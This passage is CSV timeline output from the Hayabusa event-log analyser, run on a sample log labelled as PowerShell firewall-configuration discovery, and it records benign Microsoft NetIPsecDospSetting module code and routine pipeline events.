IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $fa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) 
{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] 
${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, 